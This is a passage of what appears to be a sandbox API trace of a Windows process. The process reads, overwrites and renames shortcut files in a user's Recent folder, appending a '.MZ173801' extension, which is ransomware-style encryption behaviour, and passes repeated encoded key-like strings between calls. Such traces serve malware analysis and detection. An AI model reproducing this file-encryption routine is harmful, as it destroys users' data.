lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.076] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.076] GetCurrentThreadId () returned 0x1358 [0111.077] GetCurrentThreadId () returned 0x1358 [0111.077] GetCurrentThreadId () returned 0x1358 [0111.077] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RHvCNbn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rhvcnbn.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.077] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.077] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.077] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x277 [0111.077] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.077] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x277, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x277, lpOverlapped=0x0) returned 1 [0111.078] CloseHandle (hObject=0x3f4) returned 1 [0111.078] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RHvCNbn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rhvcnbn.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.079] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x277, lpOverlapped=0x0) returned 1 [0111.080] CloseHandle (hObject=0x3f4) returned 1 [0111.082] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RHvCNbn.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rhvcnbn.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RHvCNbn.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rhvcnbn.lnk.mz173801")) returned 1 [0111.083] GetCurrentThreadId () returned 0x1358 [0111.083] GetCurrentThreadId () returned 0x1358 [0111.083] GetCurrentThreadId () returned 0x1358 [0111.083] GetCurrentThreadId () returned 0x1358 [0111.083] GetCurrentThreadId () returned 0x1358 [0111.083] GetCurrentThreadId () returned 0x1358 [0111.084] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x763955ce, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x763955ce, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x763955ce, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52b, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="RLrwCvmuE.lnk", cAlternateFileName="RLRWCV~1.LNK")) returned 1 [0111.084] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.084] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.084] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RLrwCvmuE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rlrwcvmue.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x763955ce, ftCreationTime.dwHighDateTime=0x1d5fb6e, ftLastAccessTime.dwLowDateTime=0x763955ce, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x763955ce, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x52b)) returned 1 [0111.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0111.085] GetCurrentThreadId () returned 0x1358 [0111.085] GetCurrentThreadId () returned 0x1358 [0111.085] GetCurrentThreadId () returned 0x1358 [0111.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0111.086] GetCurrentThreadId () returned 0x1358 [0111.086] GetCurrentThreadId () returned 0x1358 [0111.086] GetCurrentThreadId () returned 0x1358 [0111.086] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RLrwCvmuE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rlrwcvmue.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.086] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0111.086] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.086] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x52b [0111.086] SetFilePointer (in: hFile=0x3f4, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0111.086] ReadFile (in: hFile=0x3f4, lpBuffer=0x2432c60, nNumberOfBytesToRead=0x52b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2432c60*, lpNumberOfBytesRead=0x19f9b0*=0x52b, lpOverlapped=0x0) returned 1 [0111.087] CloseHandle (hObject=0x3f4) returned 1 [0111.088] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RLrwCvmuE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rlrwcvmue.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f4 [0111.089] WriteFile (in: hFile=0x3f4, lpBuffer=0x2434c90*, nNumberOfBytesToWrite=0x52b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2434c90*, lpNumberOfBytesWritten=0x19f9bc*=0x52b, lpOverlapped=0x0) returned 1 [0111.090] CloseHandle (hObject=0x3f4) returned 1 [0111.091] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RLrwCvmuE.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rlrwcvmue.lnk"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\RLrwCvmuE.lnk.MZ173801" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\rlrwcvmue.lnk.mz173801")) returned 1 [0111.091] GetCurrentThreadId () returned 0x1358 [0111.091] GetCurrentThreadId () returned 0x1358 [0111.091] GetCurrentThreadId () returned 0x1358 [0111.091] GetCurrentThreadId () returned 0x1358 [0111.091] GetCurrentThreadId () returned 0x1358 [0111.091] GetCurrentThreadId () returned 0x1358 [0111.091] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cae5f4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x971b469b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x971b6d5d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x304, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Roaming.lnk", cAlternateFileName="")) returned 1 [0111.091] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0111.091] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0111.092] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Roaming.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\recent\\roaming.lnk"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9cae5f4, ftCreationTime.dwHighDateTime=0x1d5f12a, ftLastAccessTime.dwLowDateTime=0x971b469b, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0x971b6d5d, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x304)) returned 1 [0111.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0111.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, 